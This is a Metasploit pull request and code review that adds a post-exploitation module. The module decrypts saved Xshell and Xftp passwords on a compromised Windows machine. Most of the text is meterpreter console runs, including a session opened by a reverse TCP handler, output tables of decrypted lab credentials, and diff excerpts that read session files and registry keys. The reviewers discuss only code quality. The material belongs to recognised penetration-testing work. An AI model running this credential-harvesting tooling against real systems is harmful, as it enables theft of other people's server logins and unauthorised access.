### PR TITLE
Gather xshell and xftp passwords

### PR DESCRIPTION
**Pull request by cn-kali-team**
This module can decrypt the password of xshell and xftp, If the user chooses to remember the password.
- Analysis of encryption algorithm [here](https://github.com/HyperSine/how-does-Xmanager-encrypt-password)
## Verification
You can find its official website [here](https://www.netsarang.com/).
- Install the xshell and xftp to the target machine to get a meterpreter session
- Do not specify master password
```
meterpreter > run post/windows/gather/credentials/xshell_xftp_password 

[-] Unexpected Windows error 1332
UserName: C:\Users\Administrator\Documents\NetSarang
====================================================

Type         Name                           Host            Port  UserName  Plaintext  Password
----         ----                           ----            ----  --------  ---------  --------
Xftp_V5.3    新建会话.xfp                   192.168.76.1    2121  lftpd     lftpd      yhmb27u7ThR1+BNb5T+/aaps3NvoY3zmr7pVLjWIgfdsyVeHMA==
Xshell_V5.3  新建会话 - 副本 (2).xsh        192.168.76.134  22    kt        123456     l03cn+pMjZae727K08KaOmKSgOaGzww/XVqGr/PKEgIMkjrcbJI=
Xshell_V5.3  新建会话 - 副本 (3).xsh        192.168.76.134  22    kt        123456     l03cn+pMjZae727K08KaOmKSgOaGzww/XVqGr/PKEgIMkjrcbJI=
Xshell_V5.3  新建会话 - 副本 (4).xsh        192.168.76.134  22    kt        123456     l03cn+pMjZae727K08KaOmKSgOaGzww/XVqGr/PKEgIMkjrcbJI=
Xshell_V5.3  新建会话 - 副本.xsh            192.168.76.134  22    kt        123456     l03cn+pMjZae727K08KaOmKSgOaGzww/XVqGr/PKEgIMkjrcbJI=
Xshell_V5.3  新建会话.xsh                   192.168.76.134  22    kt        123456     l03cn+pMjZae727K08KaOmKSgOaGzww/XVqGr/PKEgIMkjrcbJI=

[-] Invalid MASTER_PASSWORD, Decryption failed!
UserName: C:\Users\Administrator\Documents\NetSarang Computer\6
===============================================================

Type         Name              Host          Port  UserName  Plaintext  Password
----         ----              ----          ----  --------  ---------  --------
Xftp_V5.3    新建会话.xfp      192.168.76.1  2121  lftpd                sQsnGxC7ThR1+BNb5T+/aaps3NvoY3zmr7pVLjWIgfdsyVeHMA==
Xshell_V6.0  新建会话.xsh                    22    kt                   

meterpreter > 
```
- Specify master password `MASTER_PASSWORD`
```
meterpreter > run post/windows/gather/credentials/xshell_xftp_password MASTER_PASSWORD=123456

[-] Unexpected Windows error 1332
UserName: C:\Users\Administrator\Documents\NetSarang
====================================================

Type         Name                           Host            Port  UserName  Plaintext  Password
----         ----                           ----            ----  --------  ---------  --------
Xftp_V5.3    新建会话.xfp                   192.168.76.1    2121  lftpd     lftpd      yhmb27u7ThR1+BNb5T+/aaps3NvoY3zmr7pVLjWIgfdsyVeHMA==
Xshell_V5.3  新建会话 - 副本 (2).xsh        192.168.76.134  22    kt        123456     l03cn+pMjZae727K08KaOmKSgOaGzww/XVqGr/PKEgIMkjrcbJI=
Xshell_V5.3  新建会话 - 副本 (3).xsh        192.168.76.134  22    kt        123456     l03cn+pMjZae727K08KaOmKSgOaGzww/XVqGr/PKEgIMkjrcbJI=
Xshell_V5.3  新建会话 - 副本 (4).xsh        192.168.76.134  22    kt        123456     l03cn+pMjZae727K08KaOmKSgOaGzww/XVqGr/PKEgIMkjrcbJI=
Xshell_V5.3  新建会话 - 副本.xsh            192.168.76.134  22    kt        123456     l03cn+pMjZae727K08KaOmKSgOaGzww/XVqGr/PKEgIMkjrcbJI=
Xshell_V5.3  新建会话.xsh                   192.168.76.134  22    kt        123456     l03cn+pMjZae727K08KaOmKSgOaGzww/XVqGr/PKEgIMkjrcbJI=

UserName: C:\Users\Administrator\Documents\NetSarang Computer\6
===============================================================

Type         Name              Host          Port  UserName  Plaintext  Password
----         ----              ----          ----  --------  ---------  --------
Xftp_V5.3    新建会话.xfp      192.168.76.1  2121  lftpd     lftpd      sQsnGxC7ThR1+BNb5T+/aaps3NvoY3zmr7pVLjWIgfdsyVeHMA==
Xshell_V6.0  新建会话.xsh                    22    kt                   

meterpreter > 
```
- run creds
```
192.168.76.1    192.168.76.132  2121/tcp (ftp)  lftpd     lftpd                                                                         Password            
192.168.76.1    192.168.76.132  2121/tcp (ftp)  lftpd                                                                                   Blank password      
192.168.76.134  192.168.76.132  22/tcp (ssh)    kt        123456                                                                        Password            

```

### CODE REVIEW

File: lib/rex/parser/netsarang.rb [hunk 1]
```diff
@@ -0,0 +1,91 @@
...
+
+        # new(type, version, username, sid, master_password = nil)
+        #
+        # === Argument
+        # === Options
+        # :type              :: [Enum]   xshell or xftp.
+        # :version           :: [String] Specify version of session file.
+        # :username          :: [String] Specify username. This parameter will be used if version > 5.2.
+        # :sid               :: [String] Specify SID. This parameter will be used if version >= 5.1.
+        # :master_password   :: [String] Specify user's master password.
```
Comment (acammack-r7) [inline lib/rex/parser/netsarang.rb:21]: A quick note: code documentation in Metasploit is in the [YARD format](https://rubydoc.info/gems/yard/file/docs/GettingStarted.md) (like https://github.com/rapid7/metasploit-framework/blob/1acb5ac18aa62aa3e00314e815531ca11b1bc8da/lib/msf/core/payload_set.rb#L200-L214). Thanks for adding code docs!

File: modules/post/windows/gather/credentials/xshell_xftp_password.rb [hunk 2]
```diff
@@ -0,0 +1,234 @@
...
+    tbl = Rex::Text::Table.new(
+      'Header' => "Path: #{path}",
+      'Columns' => columns
+    )
+    xsh.each do |item|
+      file = read_file(item['path'] + session.fs.file.separator + item['name'])
+      raise 'No data to parse' if file.nil? || file.empty?
+
+      file = try_encode_file(file)
+      ini = Rex::Parser::Ini.from_s(file)
```
Comment (bcoles) [inline modules/post/windows/gather/credentials/xshell_xftp_password.rb:117]: Using `raise` here will bail out of the method if any of the identified files are empty. That's probably not the expected behavior. Presumably you meant something like this:

```suggestion
      file_name = item['path'] + session.fs.file.separator + item['name']
      file_contents = read_file(file_name)
      
      if file_contents.nil? || file_contents.empty?
        print_status "Skipping empty file: #{file_name}"
        next
      end

      file = try_encode_file(file_contents)
      ini = Rex::Parser::Ini.from_s(file)
```

File: modules/post/windows/gather/credentials/xshell_xftp_password.rb [hunk 3]
```diff
@@ -0,0 +1,234 @@
...
+        port: port,
+        username: username,
+        password: xshell_plaintext
+      }
+      net_sarang_store_config(config)
+      tbl << ['Xshell_V' + version.to_s, item['name'], host, port, username, xshell_plaintext, password]
+    end
+    xfp.each do |item|
+      file = read_file(item['path'] + session.fs.file.separator + item['name'])
+      raise 'No data to parse' if file.nil? || file.empty?
```
Comment (bcoles) [inline modules/post/windows/gather/credentials/xshell_xftp_password.rb:133]: Using `raise` is probably unintended. See comment above.

File: modules/post/windows/gather/credentials/xshell_xftp_password.rb [hunk 4]
```diff
@@ -0,0 +1,234 @@
...
+      'Plaintext',
+      'Password'
+    ]
+    tbl = Rex::Text::Table.new(
+      'Header' => "Path: #{path}",
+      'Columns' => columns
+    )
+    xsh.each do |item|
+      file = read_file(item['path'] + session.fs.file.separator + item['name'])
+      raise 'No data to parse' if file.nil? || file.empty?
```
Comment (bcoles) [inline modules/post/windows/gather/credentials/xshell_xftp_password.rb:172]: Using `raise` is probably unintended. See comment above.

File: modules/post/windows/gather/credentials/xshell_xftp_password.rb [hunk 5]
```diff
@@ -0,0 +1,234 @@
...
+        port: port,
+        username: username,
+        password: xshell_plaintext
+      }
+      net_sarang_store_config(config)
+      tbl << ['Xshell_V' + version.to_s, item['name'], host, port, username, xshell_plaintext, password]
+    end
+    xfp.each do |item|
+      file = read_file(item['path'] + session.fs.file.separator + item['name'])
+      raise 'No data to parse' if file.nil? || file.empty?
```
Comment (bcoles) [inline modules/post/windows/gather/credentials/xshell_xftp_password.rb:194]: Using `raise` is probably unintended. See comment above.

File: modules/post/windows/gather/credentials/xshell_xftp_password.rb [hunk 6]
```diff
@@ -0,0 +1,234 @@
...
+      'Header' => "Path: #{path}",
+      'Columns' => columns
+    )
+    xsh.each do |item|
+      file = read_file(item['path'] + session.fs.file.separator + item['name'])
+      raise 'No data to parse' if file.nil? || file.empty?
+
+      file = try_encode_file(file)
+      ini = Rex::Parser::Ini.from_s(file)
+      version, host, port, username, password = parser_xsh(ini)
```
Comment (bcoles) [inline modules/post/windows/gather/credentials/xshell_xftp_password.rb:118]: Unless I'm mistaken, there's no need to do any INI parsing in this module.

As there's no validation of the input data to the `Rex::Parser::Ini` method, the INI parsing could be moved to the `parser_xsh` and `parser_xfp` methods in the `NetSarang` library which already imports the `require 'rex/parser/ini'` library.

File: modules/post/windows/gather/credentials/xshell_xftp_password.rb [hunk 7]
```diff
@@ -0,0 +1,234 @@
...
+
+      parent_key_6 = "HKEY_USERS\\#{user_profiles['SID']}\\Software\\NetSarang\\Common\\6\\UserData"
+      parent_key_5 = "HKEY_USERS\\#{user_profiles['SID']}\\Software\\NetSarang\\Common\\5\\UserData"
+      # get session file path
+      net_sarang_path_6 = expand_path(registry_getvaldata(parent_key_6, 'UserDataPath'))
+      net_sarang_path_5 = expand_path(registry_getvaldata(parent_key_5, 'UserDataPath'))
+
+      # enum session file
+      enum_version_5_session_file(net_sarang_path_5, user_profiles) if session.fs.file.exist?(net_sarang_path_5)
+      enum_version_6_session_file(net_sarang_path_6, user_profiles) if session.fs.file.exist?(net_sarang_path_6)
```
Comment (bcoles) [inline modules/post/windows/gather/credentials/xshell_xftp_password.rb:231]: All the `Rex::Text::Table` code in the `enum_version_5_session_file` and `enum_version_6_session_file` methods is duplicated. If in the future a `enum_version_7_session_file` method is added, that will lead to more duplication.

The table `columns` are exactly the same for each version. The `Header` is different for each table (based on filename), but how important is this information as a header? Perhaps the filename should be moved to a `column` ?

Is the distinction between versions 5 and 6 important outside of parsing? If not, the operator probably doesn't care whether it's version 5 or 6.

The typical approach is to have the methods which retrieve data (`enum_version_5_session_file`, `enum_version_6_session_file`) return a `Hash` of data which is then parsed, stored as `loot`, stored as `creds`, and printed in a `Table` in the `exploit` method. This is a much cleaner approach.

Comment (cn-kali-team) [reply modules/post/windows/gather/credentials/xshell_xftp_password.rb]: Thanks for your correction, I have simplified the code according to the comments

**Comment by bwatters-r7** [comment]
Hi there!  I grabbed this to get it ready to land.  I see you pushed a commit labelled "add docs" but the friendly bot above referred to specific module documentation you can learn more about from the provided links here: https://github.com/rapid7/metasploit-framework/pull/13525#issuecomment-635372113

I'll still spin up a test environment and poke around.  Let me know if you have any questions!

**Comment by bwatters-r7** [comment]
```
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.135.168:5555 
[*] Sending stage (201283 bytes) to 192.168.132.125
[*] Meterpreter session 1 opened (192.168.135.168:5555 -> 192.168.132.125:49723) at 2020-06-09 18:39:25 -0500

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > backgrouns
[-] Unknown command: backgrouns.
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use post/windows/gather/credentials/xshell_xftp_password 
msf5 post(windows/gather/credentials/xshell_xftp_password) > show options

Module options (post/windows/gather/credentials/xshell_xftp_password):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   MASTER_PASSWORD                   no        If the user sets the master password, e.g.:123456
   SESSION                           yes       The session to run this module on.

msf5 post(windows/gather/credentials/xshell_xftp_password) > set session 1
session => 1
msf5 post(windows/gather/credentials/xshell_xftp_password) > run


[*] Gather Xshell and Xftp Passwords on DESKTOP-D1E425Q
[*] Search session files on C:\Users\msfuser\Documents\NetSarang Computer\6
Xshell and Xftp Password
========================

Type         Name             Host             Port  UserName  Plaintext     Password
----         ----             ----             ----  --------  ---------     --------
Xftp_V6.0    test.xfp         test             22    testuser  testpassword  IhCDFzh41tGLQ7eTn3NeDfmh3ccCvwoae4MDP59xU6AMKd6CztrcmVcomwU=
Xshell_V6.0  New Session.xsh  tuser@127.0.0.1  22                            

[+] Passwords stored in: /home/tmoose/.msf4/loot/20200609184801_default_192.168.132.125_host.xshell_xftp_577152.txt
[*] Post module execution completed
msf5 post(windows/gather/credentials/xshell_xftp_password) > 

```

**Pull request merged**